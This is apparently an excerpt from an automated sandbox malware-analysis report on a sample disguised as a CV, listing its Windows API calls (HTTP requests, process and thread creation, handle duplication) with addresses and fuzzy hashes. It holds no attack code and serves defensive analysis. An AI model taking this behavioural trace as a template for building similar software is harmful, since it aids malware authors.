                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ChildEnumWindows
                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                            • API String ID: 3555792229-1603158881
                                                                                            • Opcode ID: 591693157f53f579c7d4a9fd6e7ca5d18113462dbfb49b675056ab037fc26673
                                                                                            • Instruction ID: 9b2c18618c34b04e33224a6758ee9002ec22a48db1dae8a300d8190ea14e372e
                                                                                            • Opcode Fuzzy Hash: 591693157f53f579c7d4a9fd6e7ca5d18113462dbfb49b675056ab037fc26673
                                                                                            • Instruction Fuzzy Hash: F8918330A0024E9ADB58EF60C582FFEFBB5BF04300F54851AD659A7552DF30695AEBE0
                                                                                            APIs
                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000C30DC
                                                                                            • CoUninitialize.OLE32(?,00000000), ref: 000C3181
                                                                                            • UnregisterHotKey.USER32(?), ref: 000C32A9
                                                                                            • DestroyWindow.USER32(?), ref: 00135079
                                                                                            • FreeLibrary.KERNEL32(?), ref: 001350F8
                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00135125
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                            • String ID: close all
                                                                                            • API String ID: 469580280-3243417748
                                                                                            • Opcode ID: 38685c04b83f28a0ea730f170d28a762e2645180ab888812e1ad209a957edb0f
                                                                                            • Instruction ID: 23594634fd98ba4da71dc89533b4bc452c0c225c7289eae6fc86d746ca22108e
                                                                                            • Opcode Fuzzy Hash: 38685c04b83f28a0ea730f170d28a762e2645180ab888812e1ad209a957edb0f
                                                                                            • Instruction Fuzzy Hash: 1F9126346102028FCB19EF24D895FADF3B4BF15704F5482ADE50AA7262DB31AE66CF54
                                                                                            APIs
                                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 000DCC15
                                                                                              • Part of subcall function 000DCCCD: GetClientRect.USER32(?,?), ref: 000DCCF6
                                                                                              • Part of subcall function 000DCCCD: GetWindowRect.USER32(?,?), ref: 000DCD37
                                                                                              • Part of subcall function 000DCCCD: ScreenToClient.USER32(?,?), ref: 000DCD5F
                                                                                            • GetDC.USER32 ref: 0013D137
                                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0013D14A
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0013D158
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0013D16D
                                                                                            • ReleaseDC.USER32(?,00000000), ref: 0013D175
                                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0013D200
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                            • String ID: U
                                                                                            • API String ID: 4009187628-3372436214
                                                                                            • Opcode ID: a7d8c9297b83e47a67211c30befa223c78e1ea7549dd570bb1378239e92e48d6
                                                                                            • Instruction ID: 8703052cd571e22035e0d25c7a8b1037ed3240f511594015542f745f0581d2eb
                                                                                            • Opcode Fuzzy Hash: a7d8c9297b83e47a67211c30befa223c78e1ea7549dd570bb1378239e92e48d6
                                                                                            • Instruction Fuzzy Hash: 7571DE31500205EFDF259F64EC81EEA7BB5FF49320F28426AFD555A2A6D7318881DF60
                                                                                            APIs
                                                                                              • Part of subcall function 000DB34E: GetWindowLongW.USER32(?,000000EB), ref: 000DB35F
                                                                                              • Part of subcall function 000DB63C: GetCursorPos.USER32(000000FF), ref: 000DB64F
                                                                                              • Part of subcall function 000DB63C: ScreenToClient.USER32(00000000,000000FF), ref: 000DB66C
                                                                                              • Part of subcall function 000DB63C: GetAsyncKeyState.USER32(00000001), ref: 000DB691
                                                                                              • Part of subcall function 000DB63C: GetAsyncKeyState.USER32(00000002), ref: 000DB69F
                                                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0012ED3C
                                                                                            • ImageList_EndDrag.COMCTL32 ref: 0012ED42
                                                                                            • ReleaseCapture.USER32 ref: 0012ED48
                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 0012EDF0
                                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0012EE03
                                                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0012EEDC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                            • API String ID: 1924731296-2107944366
                                                                                            • Opcode ID: cfbeecc728328ca6114956e3ca82b301ed796b46fa89fa88c75b863001f6b0ed
                                                                                            • Instruction ID: 444a75985f696f350ee294a07439d2dc1057b3d35dd3d9b82f3f97862dc65128
                                                                                            • Opcode Fuzzy Hash: cfbeecc728328ca6114956e3ca82b301ed796b46fa89fa88c75b863001f6b0ed
                                                                                            • Instruction Fuzzy Hash: 0551AA75204300AFD710DF20EC96FAA77E8AB88304F54491DF995972A2DBB09954CB52
                                                                                            APIs
                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001145FF
                                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0011462B
                                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0011466D
                                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00114682
                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0011468F
                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 001146BF
                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00114706
                                                                                              • Part of subcall function 00115052: GetLastError.KERNEL32(?,?,001143CC,00000000,00000000,00000001), ref: 00115067
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                            • String ID:
                                                                                            • API String ID: 1241431887-3916222277
                                                                                            • Opcode ID: 9503b202a00b8cc8e5da8221f1c677a337727e5d9baa800224f6abd5b31d5952
                                                                                            • Instruction ID: 838d27c3742a86d7dea999364e15840597c4e18441eb22939f2d389042d1e6fc
                                                                                            • Opcode Fuzzy Hash: 9503b202a00b8cc8e5da8221f1c677a337727e5d9baa800224f6abd5b31d5952
                                                                                            • Instruction Fuzzy Hash: 56419DB5501205BFEB199F90DC85FFB77ACFF0A718F004026FA059A191D7B09984CBA4
                                                                                            APIs
                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0015DC00), ref: 0011B715
                                                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0015DC00), ref: 0011B749
                                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0011B8C1
                                                                                            • SysFreeString.OLEAUT32(?), ref: 0011B8EB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                            • String ID:
                                                                                            • API String ID: 560350794-0
                                                                                            • Opcode ID: 34b9001ab4a1710f65f8fd3eaa022faa72d96d7ea73ee785f936ed32bab10348
                                                                                            • Instruction ID: ef3ddaf014024743ffe233fc0668cd035bd0bf03935d1937c10fe69c1e20e49c
                                                                                            • Opcode Fuzzy Hash: 34b9001ab4a1710f65f8fd3eaa022faa72d96d7ea73ee785f936ed32bab10348
                                                                                            • Instruction Fuzzy Hash: 55F11975A04209AFCF08DF94C884EEEB7B9FF49715F108469F905AB250DB71AE85CB90
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 001224F5
                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00122688
                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001226AC
                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001226EC
                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0012270E
                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0012286F
                                                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 001228A1
                                                                                            • CloseHandle.KERNEL32(?), ref: 001228D0
                                                                                            • CloseHandle.KERNEL32(?), ref: 00122947
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                            • String ID:
                                                                                            • API String ID: 4090791747-0
                                                                                            • Opcode ID: b87260670a08d8094bc7b8101c391e53b9c9d1986adbdf2274d97e00a3383fdc
                                                                                            • Instruction ID: b342c0fce98b8441b442e0afb8de297d745ac21a3639d8bdf7005ff50f20350b
                                                                                            • Opcode Fuzzy Hash: b87260670a08d8094bc7b8101c391e53b9c9d1986adbdf2274d97e00a3383fdc
                                                                                            • Instruction Fuzzy Hash: 33D19A31604351EFCB14EF24E891AAEBBE1BF85310F14856DF9899B2A2DB71DC50CB52
                                                                                            APIs
                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0012B3F4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: InvalidateRect
                                                                                            • String ID:
                                                                                            • API String ID: 634782764-0
                                                                                            • Opcode ID: 501e737274c168eb04302830a9528b7570105f5abbbc92fe146dcfc2cc9b6935
                                                                                            • Instruction ID: df901437a473995cc8a1c9342bb6f4466b5503575799146b6093187a7e1886fe
                                                                                            • Opcode Fuzzy Hash: 501e737274c168eb04302830a9528b7570105f5abbbc92fe146dcfc2cc9b6935
                                                                                            • Instruction Fuzzy Hash: 6051A330608224BFEF24AF28FCC5BAD3BA5BB05314F654015F615D66E2D771E9A0CB51
                                                                                            APIs
                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0013DB1B
                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0013DB3C
                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0013DB51
                                                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0013DB6E
                                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0013DB95
                                                                                            • DestroyIcon.USER32(00000000,?,?,?,?,?,?,000DA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0013DBA0
                                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0013DBBD
                                                                                            • DestroyIcon.USER32(00000000,?,?,?,?,?,?,000DA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0013DBC8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 1268354404-0
                                                                                            • Opcode ID: 8e17f49781fdc822bb1072eb71213398f142bfca1416b669e88d123dbaea4b94
                                                                                            • Instruction ID: 0723517421e85ba8a01b31ed81e03a150c2828d7d19665472cb4ede77f84c397
                                                                                            • Opcode Fuzzy Hash: 8e17f49781fdc822bb1072eb71213398f142bfca1416b669e88d123dbaea4b94
                                                                                            • Instruction Fuzzy Hash: EE515574600308EFDB20DF68EC81FAA77B9AB1A750F110519F946976E0D7B0AD90DB61
                                                                                            APIs
                                                                                              • Part of subcall function 00106EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00105FA6,?), ref: 00106ED8
                                                                                              • Part of subcall function 00106EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00105FA6,?), ref: 00106EF1
                                                                                              • Part of subcall function 001072CB: GetFileAttributesW.KERNEL32(?,00106019), ref: 001072CC
                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 001075CA
                                                                                            • _wcscmp.LIBCMT ref: 001075E2
                                                                                            • MoveFileW.KERNEL32(?,?), ref: 001075FB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                            • String ID:
                                                                                            • API String ID: 793581249-0
                                                                                            • Opcode ID: 1961907d191b2f923163b2846978df390faac05c24c496ae8f83f3b598351773
                                                                                            • Instruction ID: 8e522e003d2373d9a60320d597060fe48230f4441f46a7e7a65d8853a5f0e313
                                                                                            • Opcode Fuzzy Hash: 1961907d191b2f923163b2846978df390faac05c24c496ae8f83f3b598351773
                                                                                            • Instruction Fuzzy Hash: D35131B2E092199EDF64EB94DC41DDE73BCAF08310B1040AAF645E3581EBB4A7C5CB60
                                                                                            APIs
                                                                                            • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0013DAD1,00000004,00000000,00000000), ref: 000DEAEB
                                                                                            • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0013DAD1,00000004,00000000,00000000), ref: 000DEB32
                                                                                            • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0013DAD1,00000004,00000000,00000000), ref: 0013DC86
                                                                                            • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0013DAD1,00000004,00000000,00000000), ref: 0013DCF2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ShowWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1268545403-0
                                                                                            • Opcode ID: 4c4f67c6b83a95caa9dde1382ecf3f9e7fe8cb21d113251fdc96c8df7dfdf721
                                                                                            • Instruction ID: f3f6f17d6c5ed72c6628712bf2cea7e6a7c689141acabd42d1a28d969faccd35
                                                                                            • Opcode Fuzzy Hash: 4c4f67c6b83a95caa9dde1382ecf3f9e7fe8cb21d113251fdc96c8df7dfdf721
                                                                                            • Instruction Fuzzy Hash: 5C4119712147C0AADB796728ED8DA6F7AD6BB42325F19140FF0874AB61C7707880C331
                                                                                            APIs
                                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,000FAEF1,00000B00,?,?), ref: 000FB26C
                                                                                            • HeapAlloc.KERNEL32(00000000,?,000FAEF1,00000B00,?,?), ref: 000FB273
                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,000FAEF1,00000B00,?,?), ref: 000FB288
                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,000FAEF1,00000B00,?,?), ref: 000FB290
                                                                                            • DuplicateHandle.KERNEL32(00000000,?,000FAEF1,00000B00,?,?), ref: 000FB293
                                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,000FAEF1,00000B00,?,?), ref: 000FB2A3
                                                                                            • GetCurrentProcess.KERNEL32(000FAEF1,00000000,?,000FAEF1,00000B00,?,?), ref: 000FB2AB
                                                                                            • DuplicateHandle.KERNEL32(00000000,?,000FAEF1,00000B00,?,?), ref: 000FB2AE
                                                                                            • CreateThread.KERNEL32(00000000,00000000,000FB2D4,00000000,00000000,00000000), ref: 000FB2C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                            • String ID:
                                                                                            • API String ID: 1957940570-0
                                                                                            • Opcode ID: 9acf0dc25bd3ad141eaa8d6854d60024bd645fe05a55d93554a0be85fe373601
                                                                                            • Instruction ID: 636998467561e9ea2701d052ad35fb4641c4580a627e9875a27e893af6131343
                                                                                            • Opcode Fuzzy Hash: 9acf0dc25bd3ad141eaa8d6854d60024bd645fe05a55d93554a0be85fe373601
                                                                                            • Instruction Fuzzy Hash: F701C2B5240304BFEB10AFA5EC4DF6B7BACEB89B11F014411FA05DB6A1CA749850CB61
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                                            • API String ID: 0-572801152
                                                                                            • Opcode ID: 21f05a2645600ad8fd6745acbd323c7db6c3c6b212b2512a8692e4e082c97b26
                                                                                            • Instruction ID: c4fc2272c8b86c97db7708df2c306b30869e0fdae01d876c7c5ecfa89faf526d
                                                                                            • Opcode Fuzzy Hash: 21f05a2645600ad8fd6745acbd323c7db6c3c6b212b2512a8692e4e082c97b26
                                                                                            • Instruction Fuzzy Hash: DCE19271A40219ABDF18DFA8D881BEEB7B5EB58354F148039F905AB281D770AD81CB90
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Variant$ClearInit$_memset
                                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                            • API String ID: 2862541840-625585964
                                                                                            • Opcode ID: 39052ffe58db4fd2240fdc9455cae225892c0554a7d3b910567d9ddfba437e70
                                                                                            • Instruction ID: a480b1d48507a9d407f493908ae39e0d2b5efbb0ee6e4f774ffb023b8002f956
                                                                                            • Opcode Fuzzy Hash: 39052ffe58db4fd2240fdc9455cae225892c0554a7d3b910567d9ddfba437e70
                                                                                            • Instruction Fuzzy Hash: 2491A271A08219EBDF28CFA5D884FEEB7B8EF45714F108169F515AB291D7709980CFA0
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
